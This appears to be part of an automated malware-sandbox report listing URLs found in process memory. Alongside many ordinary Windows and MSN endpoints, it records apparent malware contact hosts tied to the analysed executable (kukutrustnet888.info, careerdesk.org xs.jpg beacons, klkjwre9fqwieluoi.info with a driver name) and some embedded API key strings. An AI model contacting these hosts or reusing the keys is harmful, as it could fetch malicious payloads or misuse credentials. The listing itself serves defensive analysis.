        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: SearchApp.exe, 0000001F.00000000.1554248946.000001D61A4A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://localhost:8603SeeMoreSearchResultsCodexChatUpsellCaption1CodexChatUpsellButton12023.10.04.399
        Source: RuntimeBroker.exe, 0000001E.00000000.1527273745.0000023D7190D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0
        Source: RuntimeBroker.exe, 0000001E.00000000.1527273745.0000023D7190D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0W
        Source: RuntimeBroker.exe, 0000001E.00000000.1527273745.0000023D7190D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.ho
        Source: RuntimeBroker.exe, 0000001E.00000000.1527273745.0000023D7190D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adora
        Source: RuntimeBroker.exe, 0000001E.00000000.1527273745.0000023D7190D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.ph
        Source: svchost.exe, 00000019.00000000.1455395047.000001F0FD7B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A4E000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: SearchApp.exe, 0000001F.00000000.1534355019.000001CE1226B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1536602109.000001CE13F7A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1568208623.000001D61C738000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: smartscreen.exe, 00000022.00000002.2517306215.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.00000142269A3000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.00000142269A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: SearchApp.exe, 0000001F.00000000.1550771232.000001D619B3D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlH15-2
        Source: SearchApp.exe, 0000001F.00000000.1550970635.000001D619BC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
        Source: SearchApp.exe, 0000001F.00000000.1543708623.000001CE1975E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1551041571.000001D619BCC000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1568208623.000001D61C738000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: SearchApp.exe, 0000001F.00000000.1577374778.000001D62D569000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.skype.com/Mention
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.Component.WebApi.ClientConditionsProcessor
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalog
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalogp
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstruments
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstrumentsp
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profile
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profilep
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchase
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchasep
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.StoreEdge
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.StoreEdgep
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModelp
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchasep
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.Generic
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.Genericp
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Windows.Web.Http
        Source: SearchApp.exe, 0000001F.00000000.1537379302.000001CE1889E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/
        Source: explorer.exe, 0000001B.00000002.3974617181.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.1478266221.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.1469625863.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000001E.00000000.1528658066.0000023D73980000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000020.00000000.1645898785.000001EF6E6E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?17b6de9=198930248
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?17f3b14d=-1883887666
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?17f3b14d=-1883887666$
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?20ae1e9=239873375
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?2dce9fa=384258000
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?3c84448=190368984c.dz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?475ad88=299284000c
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234v
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204i/Y
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?676dbbc=108452796S
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-21452771243
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124Qe
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?80947de5=58389342
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?9055f4a9=-1873414999
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?9055f4a9=-1873414999V
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?91387e43=-1405817186
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?939b7bae=155214274
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?9ad6cfae=1905085726
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?b3df36a1=1740533058
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?b3df36a1=1740533058lBUz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?b3df36a1=1740533058lEU
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?d090ea93=-795809133
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?e6979d=105784651
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?f260cef5=-685609761
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000017.00000000.1448703060.000001697A613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000017.00000000.1448703060.000001697A613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comdS
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comint
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B9627F8000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1676939865.000001B962800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.xboxlive.com/codeOfConduct/
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: explorer.exe, 0000001B.00000000.1482824632.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2293165397.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comy
        Source: SearchApp.exe, 0000001F.00000000.1550970635.000001D619BC4000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1537183584.000001CE18838000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1536602109.000001CE13F7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: SearchApp.exe, 0000001F.00000000.1543708623.000001CE1975E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1537183584.000001CE18838000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: SearchApp.exe, 0000001F.00000000.1537898194.000001CE189A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
        Source: SearchApp.exe, 0000001F.00000000.1554869750.000001D61A56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/fixsearch
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
        Source: SearchApp.exe, 0000001F.00000000.1606832993.000001D62E157000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
        Source: explorer.exe, 0000001B.00000000.1479087951.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3823441121.0000000002F10000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1534304815.000001CE12248000.00000004.00000001.00020000.00000000.sdmp, TextInputHost.exe, 00000026.00000000.1688581181.000001E34D144000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
